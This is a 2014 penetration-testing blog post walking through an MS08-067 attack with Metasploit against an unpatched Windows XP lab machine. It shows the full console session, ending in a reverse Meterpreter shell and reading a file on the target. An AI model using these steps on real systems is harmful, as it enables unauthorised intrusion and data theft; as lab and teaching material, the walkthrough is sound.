Archive

Archive for the ‘Penetration testing’ Category

Exploiting Parsing Flaw in Windows using Metasploit

August 23, 2014 Leave a comment

In this article I am going to show you how to exploit the parsing flaw vulnerability in NetAPI32.dll using metasploit. You can normally see this module(the dll file) running in your task manager. Many application uses this module to access the Microsoft network.  This vulnerability is considered as one among the most critical one which was exploited in October 2008. The target machine was a Windows machine. This vulnerability can allow an attacker to execute arbitrary code in the target machine when exploited. You can read about this exploit from CVE 2008-4250 and also from here. The vulnerability is caused by the server service for not handling the crafted RPC requests properly. So will get started with setting up the environment. The host machine I am going to use is Linux and the target machine is a Windows XP Service pack 3.

Pre-requisites:

  1. Take a windows machine xp machine which is not patched. Boot it in a virtual machine. You can either use Virtualbox or Vmware
  2. Turn off your firewall in the windows machine.
  3. Make sure you are able to do bi-directional ping between host and guest machines.
  4. If you are not able to ping your target machine, then try removing iptable entries and check again.

msfconsol3

 

msfconsol4

Well bi-directional ping is working good. If you have any issues with the bi-directional ping in your machine, then let me know in the comments. I faced some issues before finishing the set up.  When everything goes good then start your metasploit framework from your host machine.


➜ ~ [0] sudo msfconsole
[sudo] password for h1dd3ntru7h:

msfconsole1

Now you need to search the exploit or you can directly copy paste the exploit in the next step.


msf exploit(ms08_067_netapi) > search netapi
[!] Database not connected or cache not built, using slow search

Matching Modules
================

Name Disclosure Date Rank Description
 ---- --------------- ---- -----------
 exploit/windows/smb/ms03_049_netapi 2003-11-11 good MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow
 exploit/windows/smb/ms06_040_netapi 2006-08-08 good MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
 exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow
 exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption

If you want to know more information about this exploit you can use the info command in the console. This will give you the CVE details, exploit description, supported OS service packs and also the reference links. Choose the last entry,


msf exploit(ms08_067_netapi) > use exploit/windows/smb/ms08_067_netapi

Now you need to specify the target machine’s IP address in the console. Set your target machine’s ip address to rhost.


msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Exploit target:

Id Name
-- ----
0 Automatic Targeting

msf exploit(ms08_067_netapi) > set rhost 10.30.11.245
rhost => 10.30.11.245

You are ready to pwn your target machine. Run exploit!


msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.30.9.73:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (769536 bytes) to 10.30.11.245
[*] Meterpreter session 1 opened (10.30.9.73:4444 -> 10.30.11.245:1054) at 2014-08-23 19:02:12 +0530

meterpreter >

That’s a successful exploit. Your target machine is now under your control. You can run arbitrary commands in the meterpreter shell. For example,


meterpreter > ifconfig

Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1

Interface 2
============
Name : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC : 08:00:27:93:75:9c
MTU : 1500
IPv4 Address : 10.30.11.245
IPv4 Netmask : 255.255.252.0

meterpreter > 

I am going to read a text file named “secret_information.txt.txt” which is located in the target machine’s Desktop from the meterpreter shell.

msfconsole5


meterpreter > pwd
C:\WINDOWS\system32

meterpreter > cd ../../

meterpreter > cd Documents\ and\ Settings

meterpreter > ls

Listing: C:\Documents and Settings
==================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2014-03-06 12:13:24 +0530 .
40777/rwxrwxrwx 0 dir 1980-01-01 00:00:00 +0530 ..
40777/rwxrwxrwx 0 dir 2012-11-19 16:50:34 +0530 All Users
40777/rwxrwxrwx 0 dir 2012-11-19 18:37:48 +0530 Default User
40777/rwxrwxrwx 0 dir 2012-11-19 18:36:53 +0530 LocalService
40777/rwxrwxrwx 0 dir 2012-11-19 16:54:25 +0530 NetworkService
40777/rwxrwxrwx 0 dir 2014-08-10 19:31:19 +0530 h1dd3ntru7h

meterpreter > cd h1dd3ntru7h/Desktop

meterpreter > cat secret_information.txt.txt
He he I know you will exploit me! Fixme soon! Turn on the updates!

meterpreter >

Cool huh! Make sure you fix this vulnerability by turning on your windows updates. Will get back to you with a different exploit next time. Happy hacking!

Advertisements
This Week In 4n6

Your weekly roundup of Digital Forensics and Incident Response news

RAM Slack - Random Thoughts from a Computer Forensic Examiner

Random Thoughts from a Computer Forensic Examiner

InCTF

behind the scenes

DFIR Journal

Trials and Tribulations of a DFIR life

I dont know zilch !

For the noobs out there like me

X-Ways Forensics Practitioner's Guide

The Guide to X-Ways Forensics!

Forensic Focus - Articles

Digital forensics articles and research papers

my abbreviations......

gain,learn and share knowledge!!!!

digirati82

Windows Logging Service (WLS), DFIR, etc.

Belkasoft Forensic: The Digital Evidence Blog

Searching for, analyzing and recovering digital evidence

Gail Tredwell. Amma. Truth. Lies. Scandals. Fraud. And. Reality

Three things cannot be long hidden: the sun, the moon, and the truth.

Integriography: A Journal of Broken Locks, Ethics, and Computer Forensics

Musings about UAVs, search & rescue, computer forensics, cyber security, and the state of play in all .....

Life is beautiful

when the mind is full with love, you see beauty in every thing

Techno Krat

.... Dare To Try .......